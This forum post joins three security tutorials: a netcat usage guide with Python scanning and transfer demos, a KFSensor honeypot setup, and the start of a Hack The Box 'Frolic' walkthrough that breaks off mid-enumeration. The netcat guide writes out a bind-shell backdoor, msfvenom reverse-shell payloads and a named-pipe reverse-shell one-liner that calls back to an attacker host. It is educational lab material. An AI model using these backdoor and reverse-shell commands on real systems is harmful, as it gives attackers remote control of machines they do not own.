05-14-2020, 11:58 AM
Table of Contents:
- Introduction
- Features
- Getting start with NC
- Connecting to a Server
- Fetching HTTP header
- Chatting
- Creating a Backdoor
- Verbose Mode
- Save Output to Disk
- Port Scanning
- TCP Delay Scan
- UDP Scan
- Reverse TCP Shell Exploitation
- Randomize Port
- File Transfer
- Reverse Netcat Shell Exploitation
- Banner grabbing
Netcat (nc) is a utility that reads and writes data across network connections using TCP or UDP. It can be used both for attacking and for defence. On the attacking side it can be driven by scripts, which makes it a dependable back end; on the defensive side it helps debug and investigate the network.
Features
The feature list below is the one Nmap's Ncat advertises; netcat-traditional and OpenBSD netcat cover only part of it (no SCTP, no SSL, and not every option shown later), so check nc -h on the box you are actually on.
- Act as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for fixing problems, finding security flaws, or testing custom commands) is to interact with it using Netcat. This lets you control every character sent and view the raw, unfiltered responses.
- Redirect or proxy TCP/UDP/SCTP traffic to other ports or hosts. This can be done using simple redirection (everything sent to a port is automatically relayed somewhere else you specify in advance) or by acting as a SOCKS or HTTP proxy so clients specify their own destinations. In client mode, Netcat can connect to destinations through a chain of anonymous or authenticated proxies.
- Run on all major operating systems. Binaries are distributed for Linux, Windows, and Mac OS X, and Netcat compiles on most other systems. A trusted tool must be available whenever you need it, no matter what computer you're using.
- Encrypt communication with SSL, and transport it over IPv4 or IPv6.
- Act as a network gateway for execution of system commands, with I/O redirected to the network. It was designed to work like the Unix utility cat, but for the network.
- Act as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server. This enables multiple machines hidden behind NAT gateways to communicate with each other, and also enables the simple Netcat chat mode.
The most basic option to start with is the help flag, which lists every option netcat accepts:
nc -h
![[Image: 1.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-FCRziMOktAU/XKJELF5pefI/AAAAAAAAdwo/yfKGfPtFsocd0H0aFmnDhps9oQd2l7MzQCLcBGAs/s1600/1.png?w=687)
Connecting to a Server
Here we connect to an FTP server with the IP address 192.168.1.6. To connect, give netcat the target address and the port on which the service is listening; in our case that is port 21, FTP.
Syntax: nc [Target IP Address] [Target Port]
nc 192.168.1.6 21
As the image shows, the server runs vsFTPd, and after supplying the login credentials we are logged into the FTP server.
![[Image: 2.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-cDeP_ErlBNE/XKJEO48SG2I/AAAAAAAAdxM/CzN2G1bin3IjjFQNM4flz-q3WwF7P0DyQCLcBGAs/s1600/2.png?w=687)
Fetching HTTP header
We can use netcat to fetch information about any web server. Back on the server we connected to earlier, an HTTP service is running on port 80, so we connect to it with netcat as before. Once connected, we type an HTTP request by hand. A HEAD request returns only the response headers. The request line needs spaces between the method, the path and the version, and it must be followed by an empty line (press Enter twice); otherwise the server keeps waiting for more headers. To get the page body as well, send GET / HTTP/1.0 instead.
nc 192.168.1.6 80
HEAD / HTTP/1.0
As the image shows, the server's response headers are displayed through the netcat connection.
![[Image: 3.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-99gHjIwFUdc/XKJEQVuo6CI/AAAAAAAAdxc/N0955oP_rcYfd17EwQKEzjHWpmFG2djQgCLcBGAs/s1600/3.png?w=687)
Chatting
Netcat can also be used to chat between two users. A connection has to be established first, so we need two devices: one plays the role of listener and the other of initiator. Once the connection is up, either side can type and the other side sees it. Here we set up a chat between two users on different operating systems.
User 1
OS: Windows 10
IP Address: 192.168.1.4
Role: Listener
User 2
OS: Kali Linux
IP Address: 192.168.1.35
Role: Initiator
This step comes up in almost every netcat scenario: first, create a listener. We use the following command:
nc -lvvp 4444
where,
[-l]: listen for an incoming connection instead of initiating one
[-vv]: verbose; one -v is enough, a second one makes netcat report more
[-p]: the local port to bind, 4444 here
![[Image: 5.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/--ssyFylG33w/XKJEQ3zUa6I/AAAAAAAAdxk/isRI1qy3gVQwamwoOrJvpatNFqvTzMXbgCLcBGAs/s1600/5.png?w=687)
Now, it’s time to create an initiator, for this we will just provide the IP Address of the System where we started the Listener followed by the port number.
NOTE: Use the same port to create an initiator which was used in creating listener
nc 192.168.1.4 4444
![[Image: 4.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-Mm_3rbcwFM4/XKJEQ4uv6zI/AAAAAAAAdxg/Em4B1VUGObEe7a4XYNRMSIW0MVhLZdLJwCLcBGAs/s1600/4.png?w=687)
Creating a Backdoor
We can also plant a backdoor with nc: a listener that hands a shell to whoever connects, so we can come back to the target at any time. Note that this is a bind shell with no authentication at all; anyone who can reach the port gets the shell. Command for a Linux target:
nc -l -p 2222 -e /bin/bash
This opens a listener that attaches the stdin and stdout of /bin/bash to whatever connects. The -e option exists in netcat-traditional and in Nmap's Ncat; the OpenBSD netcat that Debian and Ubuntu install by default does not have it, so check nc -h for -e before relying on it. From the attacking machine, connect to the port and you have the shell:
nc 192.168.1.35 2222
![[Image: 7.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-LNAthLAw-wM/XKJER6ZGkXI/AAAAAAAAdxs/woKFgzSgzKM1BdInf2xcqAhGhU7yqe07ACLcBGAs/s1600/7.png?w=687)
Verbose Mode
Verbose mode is enabled with the [-v] parameter and makes netcat print what it is doing. To see the difference we connect to a server twice, once without and once with -v. In the image below, with [-v] added netcat reports the address and port it connects to and whether the connection opened.
nc 192.168.1.6 21 -v
![[Image: 8.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-OLF1lLyxU8g/XKJESbBljkI/AAAAAAAAdxw/JWRJ0tB-mK0XUEwWPSbm4uq63kI7136CACLcBGAs/s1600/8.png?w=687)
Save Output to Disk
To keep a record for later reference we can save what goes over the connection. The -o parameter of traditional netcat writes a hex dump of the traffic in both directions to the given file. It is a hex dump rather than plain text, so it is for record keeping, not for readability.
nc 192.168.1.6 21 -v -o /root/output.txt
Once the command has run, check the location to confirm the dump was written; in this case it is /root/output.txt.
![[Image: 9.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-ryOiNRgW_qI/XKJESQYgV4I/AAAAAAAAdx0/cJM80Q-xaqQP469OuOCoczxtyuky60MuACLcBGAs/s1600/9.png?w=687)
Port Scanning
Netcat can be used as a crude port scanner although it was not designed as one. The [-z] option puts it in zero-I/O mode: it attempts a connection to each port and closes it without sending any data. What it reports is only whether the port accepted the connection; the service names printed with -v come from the port number (the /etc/services table), not from probing the service. Netcat can perform TCP and UDP scans.
TCP Scan
nc -v -n -z -w 2 192.168.1.6 21-1100
Here,
- [-v]: verbose mode
- [-n]: numeric-only IP addresses, no DNS lookups
- [-z]: zero-I/O mode, used for scanning: connect and close without sending data
- [-w 2]: timeout of 2 seconds for connects and final network reads
From the given image we can see that the target machine has lots of ports open with various services running on them.
![[Image: 11.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-YCM6zXEcgIA/XKJELFRxwSI/AAAAAAAAdwk/AM-GRKi6HLg_MwRlyTPBT4vxel1K0LOjQCLcBGAs/s1600/11.png?w=687)
TCP Delay Scan
To be less noisy in an environment, slow the scan down. The [-i] option in netcat-traditional and OpenBSD netcat sets an interval in seconds between consecutive port probes. In Nmap's Ncat, -i means idle timeout instead, so check which variant you have before using it.
nc -z -v -i 10 192.168.1.6 21-80
![[Image: 13.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-yX_7tIJ6Dxw/XKJEMgI4HrI/AAAAAAAAdww/UtYpJD-o70kakiCnCTC5P4HbPr5zl1X7ACLcBGAs/s1600/13.png?w=687)
UDP Scan
Netcat can scan UDP ports in a similar way; the [-u] parameter switches it to UDP. UDP has no handshake, so netcat reports a port as open unless an ICMP port unreachable message comes back, which means open and filtered ports look the same. Treat UDP results as hints and confirm them with a protocol-specific probe.
nc -vzu 192.168.1.6 80-90
![[Image: 12.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-4tL-B5iisNo/XKJELF73KhI/AAAAAAAAdwg/uPjMcrfSzfkRMNikWU0c93MUnqPAmvywQCLcBGAs/s1600/12.png?w=687)
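The three scans above (plain -z, -w timeout, -i delay) all come down to one operation: attempt a TCP connection, record the outcome, send nothing. The following is an added example, not code from the original article, that implements that connect scan in Python so the three possible outcomes are explicit. Hosts and ports in it are assumptions for the demo; the self-test only talks to 127.0.0.1, where it starts its own listener and also picks a port it knows is closed.

```python
# Added example: a connect()-style TCP port scanner mirroring `nc -z -v -n -w <secs> -i <secs>`.
# Nothing is written on a connected socket (zero-I/O), every connect() is bounded by a
# timeout, and an optional delay between probes slows the scan down.
import socket
import time


def tcp_connect_scan(host, ports, timeout=2.0, delay=0.0):
    """Return {port: 'open'|'closed'|'filtered'} for each port in `ports`.

    'open'     -> TCP handshake completed (what nc -z -v reports as open)
    'closed'   -> the host answered with RST (ECONNREFUSED)
    'filtered' -> nothing came back before `timeout` (firewall drop, host down)
    The socket is closed right after connect(); no data is ever sent, which is
    exactly what nc's -z flag does.
    """
    results = {}
    for i, port in enumerate(ports):
        if delay and i:
            time.sleep(delay)          # the equivalent of nc -i <secs>
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)      # the equivalent of nc -w <secs>
            try:
                s.connect((host, port))
                results[port] = "open"
            except ConnectionRefusedError:
                results[port] = "closed"
            except (socket.timeout, OSError):
                results[port] = "filtered"
    return results


def service_name(port, proto="tcp"):
    """Best-effort name, as nc -v prints it: a lookup of the port number in
    /etc/services, not a probe of whatever is actually listening."""
    try:
        return socket.getservbyport(port, proto)
    except OSError:
        return "unknown"


def _demo_ports():
    """Start a listener on an ephemeral loopback port and find a second port
    that is free (bound, then released), so the scanner can be exercised offline."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                      # nothing listens on closed_port any more
    return listener, open_port, closed_port


def run_demo():
    """Scan one open and one closed loopback port; returns (results, open, closed)."""
    listener, open_port, closed_port = _demo_ports()
    try:
        results = tcp_connect_scan("127.0.0.1", [open_port, closed_port], timeout=1.0)
    finally:
        listener.close()
    return results, open_port, closed_port


if __name__ == "__main__":
    results, _, _ = run_demo()
    for port, state in results.items():
        print(f"{port}/tcp {state} ({service_name(port)})")
```

The 'filtered' outcome is the one nc hides: with -w it simply prints nothing for a port that times out, so a firewall that drops packets looks like a port that is closed unless you compare timing.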
Reverse TCP Shell Exploitation
We can exploit a system using a combination of msfvenom and netcat. We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe
We use the shell_reverse_tcp payload to get a session: lhost and lport are our own IP address and port, and -f exe writes the result as a Windows executable. Next we start a netcat listener on the port we gave during payload creation and deliver the executable to the target. When the target runs it, the shell connects back to our listener.
nc -lvvp 2124
![[Image: 13.1.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-7wpY-Pkg-y4/XKJEMQDFw4I/AAAAAAAAdws/0rRR0629C40gO03WXIg1bGR49gfEMDQIgCLcBGAs/s1600/13.1.png?w=687)
Randomize Port
If you have no preference for which local port to listen on or connect from, traditional netcat has a -r parameter that randomizes local (and, for outgoing connections, remote) ports.
nc -lv -r
![[Image: 15.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-Vsmxr_FDUGU/XKJENJOhOKI/AAAAAAAAdw4/jU9J5aFkLv88yV4I267rgC9V8QTkvq55ACLcBGAs/s1600/15.png?w=687)
File Transfer
Netcat can transfer files between devices. Here we send a file from a Windows system to a Kali Linux system. On Windows, the sender is a listener that feeds the file into the connection; -w 30 makes it give up if nobody connects within 30 seconds.
nc -v -w 30 -p 8888 -l < C:\netcat\output.txt
![[Image: 16.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-ZmAc6rl8N0A/XKJENlGhJtI/AAAAAAAAdw8/8ss0Dlugi7QkBjabhYPp1srSfeGij1pfACLcBGAs/s1600/16.png?w=687)
On Kali we receive the file by connecting to the Windows IP address and the port that serves it, redirecting netcat's output into a file; -w 2 closes the connection two seconds after the stream goes quiet. Netcat performs no integrity check: a dropped connection leaves a truncated file without any error, so compare a hash of both copies afterwards.
nc -v -w 2 192.168.1.4 8888 > output.txt
![[Image: 17.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-RRAcqIau8kg/XKJEOGdGQYI/AAAAAAAAdxA/BSzrhAgshEYUmVEfQXYts1TdWMZsh8YVgCLcBGAs/s1600/17.png?w=687)
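The transfer above relies on netcat closing the socket as the only end-of-file marker, and nothing tells the receiver whether every byte arrived. As an added example (not code from the article), here is the same listener/receiver pair in Python with the check a practitioner would add: a SHA-256 of the received bytes compared against the sender's digest. File names, contents and the loopback port are constructed for the demo.

```python
# Added example: `nc -l -p PORT < file` / `nc host PORT > file` rebuilt in Python,
# plus the SHA-256 comparison netcat itself never performs.
import hashlib
import socket
import tempfile
import threading


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def serve_file(path, host="127.0.0.1", port=0):
    """Listener side (`nc -l -p PORT < path`): accept one client, stream the file,
    close the connection. Closing is the only EOF signal the receiver gets.
    Returns the bound port and the serving thread so the caller can join it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(1)

    def _send():
        conn, _ = srv.accept()
        with conn, open(path, "rb") as f:
            conn.sendfile(f)
        srv.close()

    t = threading.Thread(target=_send, daemon=True)
    t.start()
    return srv.getsockname()[1], t


def fetch_file(host, port, dest, expected_sha256, timeout=5.0):
    """Client side (`nc host PORT > dest`) with an integrity check.
    Returns True only if the digest of what arrived matches the sender's."""
    h = hashlib.sha256()
    with socket.create_connection((host, port), timeout=timeout) as s, open(dest, "wb") as out:
        while True:
            data = s.recv(65536)
            if not data:               # peer closed: netcat's idea of EOF
                break
            out.write(data)
            h.update(data)
    return h.hexdigest() == expected_sha256


def demo():
    """Round-trip a constructed file over loopback; returns (hash_ok, files_identical)."""
    with tempfile.TemporaryDirectory() as tmpdir:
        src = f"{tmpdir}/output.txt"
        dst = f"{tmpdir}/received.txt"
        with open(src, "wb") as f:
            f.write(b"constructed sample payload line\n" * 2000)   # constructed test data
        digest = sha256_file(src)
        port, t = serve_file(src)
        ok = fetch_file("127.0.0.1", port, dst, digest)
        t.join(5)
        return ok, digest == sha256_file(dst)


if __name__ == "__main__":
    print(demo())
```

In practice the digest travels out of band (read it off the sending host, or send it first in its own connection); if it is sent over the same unauthenticated channel, whoever can tamper with the file can tamper with the digest too.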
Reverse Netcat Shell Exploitation
We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R
![[Image: 18.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-_W6_xIjuhm4/XKJEOeJz_aI/AAAAAAAAdxE/uwwbwfeFeD8eaOB_wxJoYwZfZ3FeWGz6gCLcBGAs/s1600/18.png?w=687)
The command prints a second command that has to be run on the target system, as shown in the image below. With a listener on port 6666 already running, executing it on the target gives you a session, as shown in the image above.
![[Image: 19.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-vGuFfKHg2Yc/XKJEOhTORBI/AAAAAAAAdxI/4YG1ZTugMlgg5e-iLeTrmIhm__eMZBpBACLcBGAs/s1600/19.png?w=687)
Another way to get a reverse shell, useful when the target's netcat lacks -e, is to wire a shell to netcat through a named pipe (FIFO). First create the pipe on the target:
mknod /tmp/backpipe p
Then start the shell reading from the pipe and feed its output back through it. Note the space between the IP address and the port; the original post ran them together as one token:
/bin/sh 0</tmp/backpipe | nc 192.168.1.35 443 1>/tmp/backpipe
The shell reads commands from the FIFO, its output goes through the pipe into nc's stdin and over the network, and whatever nc receives is written into the FIFO, which closes the loop.
Start a listener on port 443 on the attacking machine before running the one-liner (the same listener form as in the chat section, with port 443); the session appears there, as shown in the image below.
![[Image: 21.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-uLfZLzS_C-c/XKJEPnZsyNI/AAAAAAAAdxU/K_54xWgEaHIS01Tfp7nheycO_dkibmlawCLcBGAs/s1600/21.png?w=687)
Banner Grabbing
To grab the banner a service presents on a port, connect with -v and read what arrives before typing anything; SSH, FTP and SMTP all announce themselves first:
nc -v 192.168.1.2 22
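Banner grabbing and the HEAD request from the "Fetching HTTP header" section are the same socket exchange: connect, optionally write a request, read what the service sends. The block below is an added example written for this post (not the article's code) that does both with raw sockets, including the CRLF CRLF terminator the HEAD request needs. The loopback SSH-style and HTTP-style servers in it are constructed stand-ins; their banner strings, and any real host or port, are assumptions.

```python
# Added example: raw-socket banner grab and HTTP HEAD, the way `nc host port` does it.
import socket
import threading


def raw_exchange(host, port, payload=b"", timeout=3.0, max_bytes=4096):
    """Connect, optionally send `payload`, then read until EOF, timeout or max_bytes.
    With payload=b"" this is banner grabbing (`nc -v host 22`): services that speak
    first (SSH, FTP, SMTP) hand over their banner without being asked."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        if payload:
            s.sendall(payload)
        while sum(map(len, chunks)) < max_bytes:
            try:
                data = s.recv(1024)
            except socket.timeout:
                break                  # service is waiting for us; stop reading
            if not data:
                break                  # peer closed the connection
            chunks.append(data)
    return b"".join(chunks)


def http_head(host, port, path="/"):
    """Send a well-formed HTTP/1.0 HEAD (request line, Host header, blank line)
    and return (status_line, {header-name: value})."""
    request = f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    raw = raw_exchange(host, port, request)
    head, _, _ = raw.partition(b"\r\n\r\n")   # HEAD has no body; headers end here
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


class _FakeServer:
    """Constructed loopback service for the demo: mode "ssh" sends a banner on
    connect and hangs up; mode "http" reads one request and answers a HEAD."""

    def __init__(self, mode):
        self.mode = mode
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.sock.accept()
        with conn:
            if self.mode == "ssh":
                conn.sendall(b"SSH-2.0-OpenSSH_7.9p1 Debian-10\r\n")   # constructed banner
            else:
                conn.recv(4096)        # the request, terminated by the blank line
                conn.sendall(b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.29\r\n"
                             b"Content-Type: text/html\r\n\r\n")      # constructed reply
        self.sock.close()


def demo_banner():
    srv = _FakeServer("ssh")
    return raw_exchange("127.0.0.1", srv.port, timeout=2.0)


def demo_head():
    srv = _FakeServer("http")
    return http_head("127.0.0.1", srv.port)


if __name__ == "__main__":
    print(demo_banner())
    print(demo_head())
```

Leaving out the blank line after the request is the usual reason a hand-typed HEAD appears to hang: the server is still waiting for the end of the header block.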
So, this was a basic guide to netcat. It’s quite an interesting tool to use as well as it is pretty easy.
![[Image: 22.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-DuU4f-igp7o/XKJEP5v8_9I/AAAAAAAAdxY/l_K9_ke9OQs69-kVrUlsJkB4tZXFSYqxgCLcBGAs/s1600/22.png?w=687)
In this article we set up a system designed to attract attackers so we can catch and study them. Since a large share of attackers worldwide target Windows servers for their known defects and vulnerabilities, we will set up a Windows honeypot. If you leave it running, you can watch attackers rehearse their attacks and prepare for them.
Table of Content:
- Introduction to Honeypot
- Introduction to KFSensor
- Working of KFSensor
A honeypot disguises itself as a real server to mislead attackers and divert their attacks. It should therefore be set up like the real server, with fake files, fake open ports and fake directories, so that what the attacker sees appears authentic. Because the honeypot looks legitimate, the attacker tends to believe they have reached the real system. One of the main differences is where the machine sits relative to the genuine servers: the decoy is normally placed in the DMZ, which ensures the internal network is not exposed to the attacker. Honeypots work by monitoring, and sometimes controlling, the intruder while they use the honeypot; this works whether the attack originates outside or inside the network, depending on where the decoy is placed. They are typically designed to review the intruder's activity, save log files, and record events such as processes started, commands entered, files added, deleted or changed, and even keystrokes.
Introduction to KFSensor
KFSensor is a honeypot for Windows systems that also acts as an IDS. Its job is to attract and detect attackers in the network, hence the name honeypot. It does so by imitating a vulnerable environment and disguising itself as a server; this not only catches the attacker but also reveals their intent. It is designed specifically for Windows and has many Windows-specific features. It is convenient and user-friendly thanks to its GUI console, and it needs little maintenance.
Working of KFSensor
KFSensor’s role is to be a decoy server for the attackers in order to protect the real thing. It does its job perfectly by opening fake ports on the system where it’s installed and gathering the information when a connection is made. It does this in precisely the same way as a routine server program, such as a web server or an SMTP server. By doing this it sets up a target, or a honeypot server, that will record the activities of an attacker.
Working with KFSensor
After downloading and installing KFSensor, when you turn it on, you will see the following window. Here, click on next.
![[Image: Screenshot_4.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-pqEHYHmz1lQ/XJ-LN_3ZYYI/AAAAAAAAdv8/pnr6vQP7PRQm2F8tQaUisp_mtmjFAzdugCLcBGAs/s1600/Screenshot_4.png?w=687&ssl=1)
Then it will ask you to select the ports as shown in the image below, after selecting the ports click on next button.
![[Image: Screenshot_5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-3H8Ez2mvg1w/XJ-LN6Dqa8I/AAAAAAAAdv4/V6-3TK3l4_0XbQntVYnyPUk5VeNf2FBdgCLcBGAs/s1600/Screenshot_5.png?w=687&ssl=1)
Then it asks whether you want e-mail notification of its alerts over time; here you can add the address to send from and the address to receive the mails at.
![[Image: Screenshot_6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-c1Up1ykK4fk/XJ-LOSrkkkI/AAAAAAAAdwA/AnGtbTspoQMNdfoTI5KCgNhzb8QkmsMSACLcBGAs/s1600/Screenshot_6.png?w=687&ssl=1)
After these formalities, click on finish button.
![[Image: Screenshot_7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-xY13RyMIs54/XJ-LOz4qSsI/AAAAAAAAdwE/kVOe8C0IeroV-rtRbRHTkHeBnc-NeSqAwCLcBGAs/s1600/Screenshot_7.png?w=687&ssl=1)
Once, you click on the finish button, it will show you the following window.
![[Image: Screenshot_8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-7pup98-5te4/XJ-LPRyz_3I/AAAAAAAAdwI/gzSL6DpCsrsxMIcBM35DyI80kG5t7y1SwCLcBGAs/s1600/Screenshot_8.png?w=687&ssl=1)
Now that the honeypot is set up, scanning the target (the machine with the honeypot installed) with nmap shows all the decoy ports as open, as in the image below:
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-aprF5m7IIQ4/XJ-LMSKrgrI/AAAAAAAAdvs/26MOAKJBIqcvBVJYEZvIaanFLmHpgkCIACLcBGAs/s1600/9.png?w=687&ssl=1)
And in KFSensor it will show the details of the scan along with its IP. It will also generate an alarm to alert you.
![[Image: Screenshot_10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-lYJxFsVJCqU/XJ-LMLg9QLI/AAAAAAAAdvk/p03uRtJjyWA5QDx5_7_J2RX7bhsd_tn0ACLcBGAs/s1600/Screenshot_10.png?w=687&ssl=1)
If the attacker uses another scanner, such as Nessus, KFSensor behaves the same way. For instance, an attack through Nessus is shown in the image below:
![[Image: Screenshot_11.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-I5BA3uYJOY0/XJ-LMMnYgEI/AAAAAAAAdvo/l_EMYu4A7r8gvhjH1Y7Q9b_1cUiygrCTgCLcBGAs/s1600/Screenshot_11.png?w=687&ssl=1)
And when the attack from Nessus is completed, it will show you the faux result as you can see in the image below :
![[Image: Screenshot_12.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-uMYecaNIO8M/XJ-LNDZQkqI/AAAAAAAAdvw/uDzWSQIQLRYSZ7_RR2G9rAKFx_Qymwj6wCLcBGAs/s1600/Screenshot_12.png?w=687&ssl=1)
And similarly, the KFSensor will alert you as it is shown in the image below :
![[Image: Screenshot_13.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-ZDudzCjv8wI/XJ-LNt9KxKI/AAAAAAAAdv0/3bAqcEtACDwcbvcFLbSLilBNRO-w_xo8QCLcBGAs/s1600/Screenshot_13.png?w=687&ssl=1)
In this way KFSensor is an effective way to detect and confuse attackers, so you can protect yourself and stay alert.
Today we are going to solve another CTF challenge “Frolic”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Expert
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Frolic is 10.10.10.111
Penetrating Methodology
- Network scanning (Nmap)
- Surfing HTTPS service port (9999)
- Enumerating directory using dirb
- Enumerating web application
- Finding Playsms management system
- Exploiting playsms and getting a reverse shell
- Getting user flag
- Finding SUID bit files
- Finding a vulnerability in the binary
- Exploiting binary and getting a root shell
- Getting the root flag
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -sV 10.10.10.111
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-nocpZGsS0Wc/XJ99S7KavwI/AAAAAAAAdtw/K3iSBgY8ogUulKJxykLWCToYcExP5boTgCLcBGAs/s1600/1.png?w=687&ssl=1)
The Nmap scan shows us that there are 4 ports are open: 22(SSH), 139(SMB), 445(SMB), 9999(HTTP)
As port 9999 is running HTTP service, we open the IP address in the web browser.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-EnImoxu5XxA/XJ99VM4NNoI/AAAAAAAAduM/JGMFBOrP41870j8to6We0ldiXuC7pCvjQCLcBGAs/s1600/2.png?w=687&ssl=1)
We don’t find anything on the web page, so we further enumerate the web service using dirb scan.
dirb
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-IVsxj7QvUFY/XJ99XjfeWvI/AAAAAAAAdus/A40LdIfTSJ0unIu-3LE_coG5ehCEspdxQCLcBGAs/s1600/3.png?w=687&ssl=1)
Dirb scan gave us a few interesting looking links, we open a link called /admin/ and find a login page.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-NJD66bLIxmk/XJ99Yv4zVBI/AAAAAAAAdu4/Uwq7RmZsj1gP8WFXm_JTw3N3amVHBkvIACLcBGAs/s1600/5.png?w=687&ssl=1)
We take a look at the source code and find a link called “login.js”.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-M8xAIfOaHqQ/XJ99ZDbsDkI/AAAAAAAAdu8/FgVge9lfeLM6rt4jMLLw6_zq3ZY6Z6mxwCLcBGAs/s1600/6.png?w=687&ssl=1)
We open the “login.js” and find username and password hardcoded in the JavaScript.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-xz5I2qAcDmQ/XJ99ZlzKSBI/AAAAAAAAdvE/kyub0_7NdDMQOYTW8MMzYF3scrEJP3iVgCLcBGAs/s1600/7.png?w=687&ssl=1)
We log in with the username and password found earlier. After logging in we find an Ook!-encoded string.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-CKpi1FQsjBw/XJ99ZqwAc3I/AAAAAAAAdvA/1QmoZ0_gF_ULWxG8ju23vzfTQdleWvjiQCLcBGAs/s1600/8.png?w=687&ssl=1)
We decode the string and find a link inside.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-n_d0NmPNZuY/XJ99aCeJpLI/AAAAAAAAdvI/U_InrE5w5ygodT-IO--3KKnfTfrFZcsIQCLcBGAs/s1600/9.png?w=687&ssl=1)
We open the link and find a page with base64 encoded string.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-vTbGFMJAzFU/XJ99S40cJVI/AAAAAAAAdt0/et-HPLBYrJULm4m7UVeMGD8uK-4tVFm_wCLcBGAs/s1600/10.png?w=687&ssl=1)
We copy the base64 encoded string and save it in our system and then convert it and save it in a file. We check the file type and find it is a zip file. We try to extract it and find it is password protected. We use fcrackzip to bruteforce the zip file and find the password to be “password”. We extract the files from the zip file and find a file called index.php. We take a look at the content of the file and find hex encoded string.
base64 -d code > encodedfile
file encodedfile
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u encodedfile
unzip encodedfile
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-FF2r5ONtbbg/XJ99SqXQukI/AAAAAAAAdts/PMKj7VUBV4wnCw8HEAwy19xrETd4FXfxgCLcBGAs/s1600/12.png?w=687&ssl=1)
We decoded the string using burpsuite and find a base64 encoded string. We decode the base64 encoded string and find a brainfuck encoded string.
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-2hohQGpiB64/XJ99To-pqcI/AAAAAAAAdt4/o38_ioDqwds3sPwIEfMPLw0QQzF6FvSngCLcBGAs/s1600/13.png?w=687&ssl=1)
We decoded the brainfuck encoded string and find a string called “idkwhatispass”.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-_eNMNghaXVw/XJ99UIcT2BI/AAAAAAAAduA/qNnyr-fB2n4VT_-kZnB5Fpq0Oexh0qzygCLcBGAs/s1600/14.png?w=687&ssl=1)
